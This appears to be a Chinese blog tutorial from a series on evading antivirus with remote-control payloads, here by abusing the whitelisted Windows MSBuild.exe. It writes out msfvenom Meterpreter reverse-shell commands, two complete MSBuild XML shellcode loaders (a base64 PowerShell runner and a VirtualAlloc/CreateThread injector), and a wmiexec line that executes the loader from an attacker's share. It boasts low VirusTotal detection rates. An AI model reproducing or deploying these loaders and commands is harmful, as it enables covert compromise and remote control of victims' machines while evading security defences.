远控免杀专题（34）-白名单MSBuild.exe执行有效载荷（VT免杀...

ethereel

一，MSBuild.exe介绍

之前在介绍免杀工具的时候已经介绍过MSBuild.exe，专题19中介绍的nps_payload：，https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA就是生成.xml文件，然后使用msbuild.exe来加载payload。还有专题20提到的GreatSCT：也是https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ可生成MSBuild.exe加载的xml文件。

Microsoft Build Engine是一个用作内置应用程序的平台，此引擎也被称为msbuild，它为项目文件提供一个XML模式，该模式控制构建平台如何处理和构建软件。VisualStudio使用MSBuild，但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe，可以在未安装Visual Studio的环境中编译和生成程序。

说明：Msbuild.exe所在路径没有被系统添加路径环境变量中，因此，Msbuild命令无法直接在cmd中使用。需要带上路径：C:\Windows\Microsoft.NET\Framework\v4.0.30319。

适用条件：.NET Framework>=4.0

二，利用MSBuild.exe执行有效载荷法1（VT查杀率4/57）

使用msfvenom生成shellcode，注意生成的是psh格式

1. 
   
2. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 lport=3333  -f psh -o shell.ps1

复制代码

然后打开shell.ps1文件，在文件最后添加一行for (;;){\n Start-sleep 60\n}，保存一下。

然后把修改后的shell.ps1文件内容进行base64编码，可以使用在线平台（例如https://www.sojson.com/base64.html）也可以使用其他编码工具。

然后把编码后的内容替换到下面的代码中cmd =处，并保存为shell.xml。

1. 
   
2. <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   
3.   <!-- This inline task executes c# code. -->
   
4.   <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
   
5.   <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
   
6.   <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
   
7.   <!-- License: BSD 3-Clause -->
   
8.   <Target Name="npscsharp">
   
9.    <nps />
   
10.   </Target>
    
11.   <UsingTask
    
12.     TaskName="nps"
    
13.     TaskFactory="CodeTaskFactory"
    
14.     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    
15.   <Task>
    
16.     <Reference Include="System.Management.Automation" />
    
17.       <Code Type="Class" Language="cs">
    
18.         <![CDATA[
    
19. 
    
20.           using System;
    
21.       using System.Collections.ObjectModel;
    
22.       using System.Management.Automation;
    
23.       using System.Management.Automation.Runspaces;
    
24.       using Microsoft.Build.Framework;
    
25.       using Microsoft.Build.Utilities;
    
26. 
    
27.       public class nps : Task, ITask
    
28.         {
    
29.             public override bool Execute()
    
30.             {
    
31.               string cmd = "JEFuRUl---base64_shellcode-----xsSW1wb3J0KCJrZXJuZWwzMi5k";
    
32. 
    
33.                 PowerShell ps = PowerShell.Create();
    
34.                 ps.AddScript(Base64Decode(cmd));
    
35. 
    
36.                 Collection<PSObject> output = null;
    
37.                 try
    
38.                 {
    
39.                     output = ps.Invoke();
    
40.                 }
    
41.                 catch(Exception e)
    
42.                 {
    
43.                     Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());
    
44.                 }
    
45.                 if (output != null)
    
46.                 {
    
47.                     foreach (PSObject rtnItem in output)
    
48.                     {
    
49.                         Console.WriteLine(rtnItem.ToString());
    
50.                     }
    
51.                 }
    
52.                 return true;
    
53.             }
    
54. 
    
55.             public static string Base64Encode(string text) {
    
56.            return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
    
57.         }
    
58. 
    
59.         public static string Base64Decode(string encodedtext) {
    
60.             return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
    
61.         }
    
62.         }
    
63.         ]]>
    
64.       </Code>
    
65.     </Task>
    
66.   </UsingTask>
    
67. </Project>

复制代码

msbuild.exe加载文件的方式有两种

1. 
   
2. 1. 本地加载执行:
   
3. - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
   
4. 
   
5. 2. 远程文件执行:
   
6. 
   
7. wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

复制代码

我这里就用本地加载进行测试，msbuild.exe在windows中的的一般路径为C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

msfconsole监听相应payload和端口，打开杀软进行测试

可正常上线

virustotal.com上shell.xml查杀杀死植入4/57

三，利用MSBuild.exe执行有效载荷法2（VT查杀率18/58）

这是三好学生大神提供的一种xml代码，源文件见https://raw.githubusercontent.co ... tes%20shellcode.xml

需要先通过msfvenom生成C＃的shellcode

1. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -f cshar

复制代码

将生成的shellcode替换为以下代码的byte[] shellcode =处，将文件保存为shell2.xml。

1. 
   
2. <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   
3.   <!-- This inline task executes shellcode. -->
   
4.   <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
   
5.   <!-- Save This File And Execute The Above Command -->
   
6.   <!-- Author: Casey Smith, Twitter: @subTee -->
   
7.   <!-- License: BSD 3-Clause -->
   
8.   <Target Name="Hello">
   
9.     <ClassExample />
   
10.   </Target>
    
11.   <UsingTask
    
12.     TaskName="ClassExample"
    
13.     TaskFactory="CodeTaskFactory"
    
14.     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    
15.     <Task>
    
16.    
    
17.       <Code Type="Class" Language="cs">
    
18.       <![CDATA[
    
19.         using System;
    
20.         using System.Runtime.InteropServices;
    
21.         using Microsoft.Build.Framework;
    
22.         using Microsoft.Build.Utilities;
    
23.         public class ClassExample :  Task, ITask
    
24.         {         
    
25.           private static UInt32 MEM_COMMIT = 0x1000;         
    
26.           private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;         
    
27.           [DllImport("kernel32")]
    
28.             private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
    
29.             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);         
    
30.           [DllImport("kernel32")]
    
31.             private static extern IntPtr CreateThread(            
    
32.             UInt32 lpThreadAttributes,
    
33.             UInt32 dwStackSize,
    
34.             UInt32 lpStartAddress,
    
35.             IntPtr param,
    
36.             UInt32 dwCreationFlags,
    
37.             ref UInt32 lpThreadId           
    
38.             );
    
39.           [DllImport("kernel32")]
    
40.             private static extern UInt32 WaitForSingleObject(           
    
41.             IntPtr hHandle,
    
42.             UInt32 dwMilliseconds
    
43.             );         
    
44.           public override bool Execute()
    
45.           {
    
46.             byte[] shellcode = new byte[195] {
    
47.               0xfc,--shellcode_here--,0x00 };
    
48.               
    
49.               UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
    
50.                 MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
51.               Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
    
52.               IntPtr hThread = IntPtr.Zero;
    
53.               UInt32 threadId = 0;
    
54.               IntPtr pinfo = IntPtr.Zero;
    
55.               hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
    
56.               WaitForSingleObject(hThread, 0xFFFFFFFF);
    
57.               return true;
    
58.           }
    
59.         }     
    
60.       ]]>
    
61.       </Code>
    
62.     </Task>
    
63.   </UsingTask>
    
64. </Project>

复制代码

在msf中监听相应端口，在测试机中执行C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe shell2.xml

msf中可上线

virustotal.com上shell2.xml查杀杀死植入18/58

侯亮大神的文章已提供了另外一种XML代码：https://micro8.gitbook.io/micro8 ... ng-payload-di-yi-ji，可以直接对接msf。

virustotal.com上该代码查杀率目前为13/58。

四，参考资料

使用msbuild.exe绕过应用程序白名单（多种方法）：https://www.cnblogs.com/backlion/p/10490573.html

MSBuild.exe-bypass应用白名单：https://pplsec.github.io/2019/03 ... ation-whitelisting/

基于白名单Msbuild.exe执行有效载荷第一季：https://micro8.gitbook.io/micro8 ... ng-payload-di-yi-ji